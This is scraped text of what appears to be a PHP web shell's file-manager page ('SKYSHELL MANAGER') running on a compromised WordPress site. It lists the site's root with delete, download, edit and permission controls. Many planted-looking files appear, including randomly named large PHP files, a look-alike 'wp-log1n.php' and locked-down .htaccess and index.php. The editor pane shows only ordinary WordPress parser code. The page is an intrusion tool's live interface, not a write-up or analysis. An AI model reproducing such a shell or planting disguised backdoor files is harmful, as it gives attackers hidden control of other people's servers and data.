📁
SKYSHELL MANAGER-
🛒
PHP v8.3.27
Create Folder
Create File
Current Path:
www
/
wwwroot
/
007win.diy
/
Name
Size
Permissions
Actions
📁
..
-
0777
🗑️
🔒
📁
264276
-
0755
🗑️
🔒
📁
6c01d2
-
0755
🗑️
🔒
📁
e0df73
-
0755
🗑️
🔒
📁
ea7c2
-
0555
🗑️
🔒
📁
wp-admin
-
0755
🗑️
🔒
📁
wp-content
-
0755
🗑️
🔒
📁
wp-includes
-
0755
🗑️
🔒
📄
.htaccess
1.13 KB
0555
🗑️
⬇️
✏️
🔒
📄
.htaccess.bk
0 KB
0644
🗑️
⬇️
✏️
🔒
📄
404.html
56.93 KB
0644
🗑️
⬇️
✏️
🔒
📄
502.html
56.93 KB
0644
🗑️
⬇️
✏️
🔒
📄
ORVX-rZSfXu.php
399.32 KB
0644
🗑️
⬇️
✏️
🔒
📄
au_122d0be7.php
24.37 KB
0644
🗑️
⬇️
✏️
🔒
📄
au_a7e73425.php
1.89 KB
0644
🗑️
⬇️
✏️
🔒
📄
au_e37f8d6e.php
166.08 KB
0644
🗑️
⬇️
✏️
🔒
📄
buy.php
1.45 KB
0444
🗑️
⬇️
✏️
🔒
📄
click.php
1.93 KB
0444
🗑️
⬇️
✏️
🔒
📄
dd.php
3.61 KB
0644
🗑️
⬇️
✏️
🔒
📄
defaults.php
1.72 KB
0444
🗑️
⬇️
✏️
🔒
📄
fr_fafd9474.php
168.08 KB
0644
🗑️
⬇️
✏️
🔒
📄
index.php
12.44 KB
0555
🗑️
⬇️
✏️
🔒
📄
index.php0
12.44 KB
0755
🗑️
⬇️
✏️
🔒
📄
it_05f98c69.php
166.08 KB
0644
🗑️
⬇️
✏️
🔒
📄
it_0a6eaac8.php
216.49 KB
0644
🗑️
⬇️
✏️
🔒
📄
item.php
1.29 KB
0444
🗑️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
⬇️
✏️
🔒
📄
mah.php
1.29 KB
0444
🗑️
⬇️
✏️
🔒
📄
networks.php
2 KB
0444
🗑️
⬇️
✏️
🔒
📄
options.php
1.29 KB
0444
🗑️
⬇️
✏️
🔒
📄
php.ini
0.1 KB
0644
🗑️
⬇️
✏️
🔒
📄
plugins.php
1.87 KB
0444
🗑️
⬇️
✏️
🔒
📄
product.php
1.72 KB
0444
🗑️
⬇️
✏️
🔒
📄
readme.html
7.25 KB
0644
🗑️
⬇️
✏️
🔒
📄
robots.txt
0.33 KB
0444
🗑️
⬇️
✏️
🔒
📄
ru_9a7b823f.php
70.78 KB
0644
🗑️
⬇️
✏️
🔒
📄
txets.php
5.21 KB
0444
🗑️
⬇️
✏️
🔒
📄
us_a54f0f43.php
53 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-activate.php
7.18 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-config.php
3.57 KB
0600
🗑️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-log1n.php
2.03 KB
0444
🗑️
⬇️
✏️
🔒
📄
wp-login.php
5.62 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-mail.php
202.73 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-settings.php
30.33 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-signup.php
33.71 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
⬇️
✏️
🔒
Editing: class-wp-block-parser-frame.php
<?php /** * Block Serialization Parser * * @package WordPress */ /** * Class WP_Block_Parser_Frame * * Holds partial blocks in memory while parsing * * @internal * @since 5.0.0 */ class WP_Block_Parser_Frame { /** * Full or partial block * * @since 5.0.0 * @var WP_Block_Parser_Block */ public $block; /** * Byte offset into document for start of parse token * * @since 5.0.0 * @var int */ public $token_start; /** * Byte length of entire parse token string * * @since 5.0.0 * @var int */ public $token_length; /** * Byte offset into document for after parse token ends * (used during reconstruction of stack into parse production) * * @since 5.0.0 * @var int */ public $prev_offset; /** * Byte offset into document where leading HTML before token starts * * @since 5.0.0 * @var int */ public $leading_html_start; /** * Constructor * * Will populate object properties from the provided arguments. * * @since 5.0.0 * * @param WP_Block_Parser_Block $block Full or partial block. * @param int $token_start Byte offset into document for start of parse token. * @param int $token_length Byte length of entire parse token string. * @param int|null $prev_offset Optional. Byte offset into document for after parse token ends. Default null. * @param int|null $leading_html_start Optional. Byte offset into document where leading HTML before token starts. * Default null. */ public function __construct( $block, $token_start, $token_length, $prev_offset = null, $leading_html_start = null ) { $this->block = $block; $this->token_start = $token_start; $this->token_length = $token_length; $this->prev_offset = isset( $prev_offset ) ? $prev_offset : $token_start + $token_length; $this->leading_html_start = $leading_html_start; } }
💾 Save Changes